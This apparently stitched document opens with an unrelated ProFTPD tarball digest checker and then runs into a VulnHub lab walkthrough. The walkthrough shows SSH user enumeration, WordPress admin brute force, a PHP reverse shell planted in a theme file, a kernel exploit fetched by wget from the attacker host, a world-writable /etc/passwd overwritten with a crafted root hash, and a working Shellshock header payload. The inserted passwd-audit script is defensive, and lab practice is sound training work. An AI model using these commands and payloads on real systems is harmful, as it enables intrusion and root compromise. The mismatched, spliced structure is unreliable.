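"""Verify a downloaded archive against a published digest list.

Added example, not code from the original post or from the ProFTPD project.
Reads 'digest  filename' lines as md5sum/sha256sum print them and checks a
file against the entry for its name; PUBLISHED_MD5 is copied from the advisory.
"""
import hashlib
import hmac
import os
import tempfile

# The two sums the ProFTPD compromise report publishes for the clean 1.3.3c tarballs.
PUBLISHED_MD5 = """\
8571bd78874b557e98480ed48e2df1d2  proftpd-1.3.3c.tar.bz2
4f2c554d6273b8145095837913ba9e5d  proftpd-1.3.3c.tar.gz
"""


def parse_sums(text):
    """{filename: digest} from md5sum/sha256sum-style lines; '*' binary markers tolerated."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        sums[name.strip().lstrip("*")] = digest.lower()
    return sums


def file_digest(path, algo):
    """Hex digest of a file, streamed so large tarballs do not need to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path, sums, algo="md5"):
    """'ok', 'MISMATCH', or 'unlisted' (no published digest for this file name)."""
    expected = sums.get(os.path.basename(path))
    if expected is None:
        return "unlisted"
    actual = file_digest(path, algo)
    # Constant-time compare: not strictly needed for public digests, but a habit worth keeping.
    return "ok" if hmac.compare_digest(actual, expected) else "MISMATCH"


def demo():
    """Constructed stand-in tarball: checked against the advisory's sum, against a
    sum we publish for it ourselves, after tampering, and for an unlisted name."""
    base = tempfile.mkdtemp(prefix="sums-")
    tarball = os.path.join(base, "proftpd-1.3.3c.tar.gz")
    with open(tarball, "wb") as f:
        f.write(b"constructed stand-in for the release tarball\n")
    against_advisory = verify_download(tarball, parse_sums(PUBLISHED_MD5))
    own = parse_sums(f"{file_digest(tarball, 'sha256')}  proftpd-1.3.3c.tar.gz")
    against_own = verify_download(tarball, own, algo="sha256")
    with open(tarball, "ab") as f:
        f.write(b"injected\n")               # simulate a modified download
    after_tamper = verify_download(tarball, own, algo="sha256")
    unlisted = verify_download(os.path.join(base, "other.tgz"), own)
    return against_advisory, against_own, after_tamper, unlisted


if __name__ == "__main__":
    print(demo())  # expected: ('MISMATCH', 'ok', 'MISMATCH', 'unlisted')
```

A digest only proves the file matches what the same site published; when the distribution server itself is the compromised host, as in this incident, the sums there can be replaced along with the tarball, which is why the advisory also points to the GPG signatures. Run the signature check first and treat the digest list as a quick pre-filter.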

[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

I've never exploited an ssh vulnerability so far, and there probably isn't one this time either.

# searchsploit openssh
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
OpenSSH 7.2p2 - Username Enumeration                                         | exploits/linux/remote/40136.py
(snip)

Only user enumeration.
Or RCE and the like in limited environments.
Nothing that leads directly to RCE?
For now, should I just run hydra against whatever users I find?

# cp /usr/share/exploitdb/exploits/linux/remote/40136.py 40136.py
# python 40136.py 
usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES]
                [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS]
                host
40136.py: error: too few arguments
# python 40136.py -U /usr/share/wordlists/rockyou.txt -e 10.10.10.10
(snip)
[*] Testing your users...
[+] password - timing: 0.018958999999999726
[+] princess - timing: 0.413513
[+] 1234567 - timing: 0.019588999999999857
[+] justin - timing: 0.019359000000000126
[+] samantha - timing: 0.01800700000000033
[+] lovers - timing: 0.018003000000000213
[+] dragon - timing: 0.023400999999999783
[+] sweety - timing: 0.020548000000000233
[+] buster - timing: 0.020329999999999515
[+] cheese - timing: 0.020527999999999658
[+] kenneth - timing: 0.0184350000000002
[+] nicholas - timing: 0.021569999999999645
[+] charles - timing: 0.018767999999999674
[+] christine - timing: 0.02230100000000057
[+] scorpio - timing: 0.43433799999999945
[+] ronald - timing: 0.022024000000000044
[+] grace - timing: 0.01963800000000049
[+] 444444 - timing: 0.018848000000000198
[+] rabbit - timing: 0.0182739999999999
[+] loverboy - timing: 0.0191719999999993
(snip)
KeyboardInterrupt

Tried rockyou.txt as the user list, but there were unexpectedly many hits, so I stopped partway.
Conversely, with that many the accuracy feels dubious.

# python 40136.py -u root 10.10.10.10
(snip)
[*] Testing your users...
[-] root - timing: 0.009611000000000036

Lots of users, but no root.
For now, try running hydra with the users found. It wouldn't finish, so I gave up.

[port 80] http Apache httpd 2.4.18 (Ubuntu)

# nikto -h 10.10.10.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.10
+ Target Hostname:    10.10.10.10
+ Target Port:        80
+ Start Time:         2020-05-04 03:10:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: b1, size: 55e1c7758dcdb, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7837 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-04 03:11:26 (GMT-4) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.10

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May  4 03:11:39 2020
URL_BASE: http://10.10.10.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.10/ ----
+ http://10.10.10.10/index.html (CODE:200|SIZE:177)                                                                  
==> DIRECTORY: http://10.10.10.10/secret/                                                                            
+ http://10.10.10.10/server-status (CODE:403|SIZE:299)                                                               
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/ ----
+ http://10.10.10.10/secret/index.php (CODE:301|SIZE:0)                                                              
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/                                                                   
==> DIRECTORY: http://10.10.10.10/secret/wp-content/                                                                 
==> DIRECTORY: http://10.10.10.10/secret/wp-includes/                                                                
+ http://10.10.10.10/secret/xmlrpc.php (CODE:405|SIZE:42)                                                            
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/ ----
+ http://10.10.10.10/secret/wp-admin/admin.php (CODE:302|SIZE:0)                                                     
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/css/                                                               
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/images/                                                            
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/includes/                                                          
+ http://10.10.10.10/secret/wp-admin/index.php (CODE:302|SIZE:0)                                                     
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/js/                                                                
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/maint/                                                             
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/network/                                                           
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/user/                                                              
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-content/ ----
+ http://10.10.10.10/secret/wp-content/index.php (CODE:200|SIZE:0)                                                   
==> DIRECTORY: http://10.10.10.10/secret/wp-content/plugins/                                                         
==> DIRECTORY: http://10.10.10.10/secret/wp-content/themes/                                                          
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/network/ ----
+ http://10.10.10.10/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)                                             
+ http://10.10.10.10/secret/wp-admin/network/index.php (CODE:302|SIZE:0)                                             
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/user/ ----
+ http://10.10.10.10/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                
+ http://10.10.10.10/secret/wp-admin/user/index.php (CODE:302|SIZE:0)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-content/plugins/ ----
+ http://10.10.10.10/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)                                           
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-content/themes/ ----
+ http://10.10.10.10/secret/wp-content/themes/index.php (CODE:200|SIZE:0)                                            
                                                                                                                     
-----------------
END_TIME: Mon May  4 03:12:26 2020
DOWNLOADED: 36896 - FOUND: 13

Sudden appearance of WordPress.
Something odd?
"http://vtcsec/secret/index.php/wp-json/" catches my eye.
When connecting to "http://10.10.10.10/secret", the page renders strangely, and many links point to the "vtcsec" domain.
So, do I need to add "vtcsec" to the hosts file?

# echo "10.10.10.10 vtcsec" >> /etc/hosts
# curl http://vtcsec
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>

The links that did not work earlier are now reachable.

# wpscan --url http://vtcsec/secret -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vtcsec/secret/ [10.10.10.10]
[+] Started: Mon May  4 07:23:46 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://vtcsec/secret/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://vtcsec/secret/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://vtcsec/secret/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9 identified (Insecure, released on 2017-11-16).
 | Found By: Rss Generator (Passive Detection)
 |  - http://vtcsec/secret/index.php/feed/, <generator>https://wordpress.org/?v=4.9</generator>
 |  - http://vtcsec/secret/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:49 <==========================================================================================================================================================> (20900 / 20900) 100.00% Time: 00:00:49
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentyfifteen
 | Location: http://vtcsec/secret/wp-content/themes/twentyfifteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.9'

[+] twentyseventeen
 | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.4'

[+] twentysixteen
 | Location: http://vtcsec/secret/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://vtcsec/secret/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://vtcsec/secret/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May  4 07:24:53 2020
[+] Requests Done: 20932
[+] Cached Requests: 47
[+] Data Sent: 4.849 MB
[+] Data Received: 3.127 MB
[+] Memory used: 264.789 MB
[+] Elapsed time: 00:01:06

First, look for admin's password.

(snip)

[+] Performing password attack on Wp Login against 1 user/s
Trying admin / loulou Time: 00:00:22 <> (1331 / 14344391)  0.00%  ETA: 67:32:Trying admin / candy1 Time: 00:00:22 <> (1333 / 14344391)  0.00%  ETA: 67:28:            Trying admin / tequieromucho Time: 00:00:23 <> (1400 / 14344391)  0.00%  ETA: 67:53Trying admin / liverpoolfc Time: 00:00:30 <> (1784 / 14344391)  0.01%  ETA: 67:56:1Trying admin / babykohTrying admin / admin Time: 00:05:59 <=========================================> (19820 / 19820) 100.00% Time: 00:05:59
[SUCCESS] - admin / admin                                                                                             

[!] Valid Combinations Found:
 | Username: admin, Password: admin
(snip)

So admin was just left at the default.
Log in with admin/admin.
I could not find a simple way to upload a file, so I went with editing an existing one.
In my case: "Appearance" > "Editor", then search.php from the Theme Files.
Near the end I appended Kali Linux's /usr/share/webshells/php/php-reverse-shell.php, modified with my own address.
Now pressing the "search" button on the WordPress page triggers the reverse shell.
Editing "404.php" would also have worked, but I did not know a path that would hit it.

Listen, press the button, and it comes in.

# nc -nlvp 8080
(push [search])
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:07:25 up  7:28,  0 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

After getting a shell

victim

$ uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker

# searchsploit linux ubuntu 16.04
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalatio | exploits/linux/local/45010.c
(snip)
# cp /usr/share/exploitdb/exploits/linux/local/45010.c 45010.c
# python -m SimpleHTTPServer 80
victim

$ cd /tmp
$ wget 10.10.10.3/45010.c
--2020-05-04 09:01:46--  http://10.10.10.3/45010.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/plain]
Saving to: '45010.c'

     0K .......... ...                                        100% 14.6M=0.001s

2020-05-04 09:01:46 (14.6 MB/s) - '45010.c' saved [13728/13728]

$ gcc 45010.c
$ ./a.out
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

There seem to be several kernel exploits, but I picked the one that looked most certain to work.

privcheck

# cp /usr/bin/unix-privesc-check pric

Kali Linux apparently ships a great program that checks privileges for you, so I tried it.
Send it to the victim and run it.

victim

$ ./pric detailed | grep WARNING
passwd: Permission denied.
Search the output below for the word 'WARNING'.  If you don't see it then
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
(snip)

The output would not stop, so I only picked the most interesting item at the top.
In this environment, "/etc/passwd" can be rewritten without being root.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cp /etc/passwd /tmp/passwd
$ openssl passwd -1 password
$1$n.m2eSNO$znpjjJIvqy12UiYDL6G90/
$ echo "root:\$1\$7Y7rVxIM\$pZaXFk7OlTVsq3X2aMiAM.:0:0:root:/root:/bin/bash" > /etc/passwd
$ cat /tmp/passwd >> /etc/passwd
$ su -
su: must be run from a terminal
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@vtcsec:/tmp$ su -
su -
Password: password

root@vtcsec:~# id
id
uid=0(root) gid=0(root) groups=0(root)
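The escalation above works because /etc/passwd is world-writable and a hash written directly into its second field is used for authentication in place of the shadow entry. The following audit script is an added example (not from the original post) that checks a passwd file for exactly those conditions: mode and owner, a second UID 0 entry, and a hash in the password field. The sample content is constructed from the tampered file shown above.

```python
import os
import stat
import tempfile

# Constructed sample: the tampered file built in the writeup above, i.e. a
# crafted root line carrying an MD5-crypt hash followed by the original root
# line that was appended back from the backup copy.
SAMPLE_PASSWD = (
    "root:$1$7Y7rVxIM$pZaXFk7OlTVsq3X2aMiAM.:0:0:root:/root:/bin/bash\n"
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def audit_passwd_text(text):
    """Return (code, detail) findings for the content of a passwd file."""
    findings = []
    seen = set()
    uid0 = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("MALFORMED", f"line {lineno}: {len(fields)} fields"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if name in seen:
            findings.append(("DUP_USER", f"line {lineno}: second entry for {name}"))
        seen.add(name)
        if pw == "":
            findings.append(("EMPTY_PASSWORD", f"line {lineno}: {name} has no password"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # Anything else is a hash that login/su will check directly, so the
            # account no longer depends on the root-only /etc/shadow.
            findings.append(("HASH_IN_PASSWD", f"line {lineno}: {name} carries a hash"))
        if uid == "0":
            uid0.append(name)
    if len(uid0) > 1:
        findings.append(("MULTI_UID0", "uid 0 entries: " + ", ".join(uid0)))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Check the file's mode and owner, then its content."""
    findings = []
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IWOTH:
        findings.append(("WORLD_WRITABLE", f"{path} mode {oct(mode)}"))
    elif mode & stat.S_IWGRP:
        findings.append(("GROUP_WRITABLE", f"{path} mode {oct(mode)} gid {st.st_gid}"))
    if st.st_uid != 0:
        findings.append(("NOT_ROOT_OWNED", f"{path} owned by uid {st.st_uid}"))
    with open(path) as fh:
        findings.extend(audit_passwd_text(fh.read()))
    return findings


def demo():
    """Write the sample to a temp file, make it world-writable as the
    privesc-check output reported for the box, and audit it."""
    fd, tmp = tempfile.mkstemp(suffix="-passwd")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_PASSWD)
    os.chmod(tmp, 0o666)
    try:
        return audit_passwd_file(tmp)
    finally:
        os.unlink(tmp)


if __name__ == "__main__":
    for code, detail in demo():
        print(f"{code}: {detail}")
```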

Done

vulnhub SickOS 1.1 notes

SickOS 1.1

Deploying from the ovf failed. Creating a new VM and attaching the existing hard disk works.

Service enumeration

# nmap -p- 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:25 EDT
Nmap scan report for 10.10.10.9
Host is up (0.00074s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds
# nmap -p22,3128,8080 -sV -version-all 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:28 EDT
Nmap scan report for 10.10.10.9
Host is up (0.00086s latency).

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open   http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds

Points of interest

  • [port 22 ssh] OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0): probably nothing here
  • [port 3128 http-proxy] Squid http proxy 3.1.19: I forgot this was a proxy and it actually cost me some effort

Details

[port 22 ssh] OpenSSH 5.9p1

Nothing in particular. No idea.

[port 3128 http-proxy] Squid http proxy 3.1.19

Does not look like there is an exploit for the proxy itself?
All access to SickOS 1.1's web service has to go through the proxy on port 3128.

# nikto -h 10.10.10.9 -useproxy 10.10.10.9:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.9
+ Target Hostname:    10.10.10.9
+ Target Port:        80
+ Proxy:              10.10.10.9:3128
+ Start Time:         2020-05-02 11:33:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec  4 19:35:02 2015
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 8674 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-05-02 11:33:58 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.9 -p 10.10.10.9:3128

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat May  2 11:43:27 2020
URL_BASE: http://10.10.10.9/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.9/ ----
+ http://10.10.10.9/cgi-bin/ (CODE:403|SIZE:286)                               
+ http://10.10.10.9/connect (CODE:200|SIZE:109)                                
+ http://10.10.10.9/index (CODE:200|SIZE:21)                                   
+ http://10.10.10.9/index.php (CODE:200|SIZE:21)                               
+ http://10.10.10.9/robots (CODE:200|SIZE:45)                                  
+ http://10.10.10.9/robots.txt (CODE:200|SIZE:45)                              
+ http://10.10.10.9/server-status (CODE:403|SIZE:291)                          
                                                                               
-----------------
END_TIME: Sat May  2 11:43:36 2020
DOWNLOADED: 4612 - FOUND: 7

There are lots of interesting things here.

Found something promising for the Apache + PHP 5.3.10 combination

# searchsploit apache php 5.3
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner            | exploits/php/remote/29316.py
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution              | exploits/php/remote/29290.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

The exploit code as-is apparently does not handle the proxied case?

About CVE-2014-6271 and CVE-2014-6278

There is apparently something called Shellshock.

# curl --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
{ "uptime": " 21:41:52 up 1:10, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"} 

In this case, querying "/cgi-bin/status" returns what looks like the output of some commands.
Being able to do OS command injection here is Shellshock!
Also, dirb does not pick up "/cgi-bin/status".
In short, there is a bug in how bash processes its input that lets extra commands slip through.

# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c id;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status

uid=33(www-data) gid=33(www-data) groups=33(www-data)

In this case, whatever header you send to "/cgi-bin/status", as long as the value is crafted to trick bash, you get OS command injection.

window 1

# rlwrap nc -nlvp 443
window 2

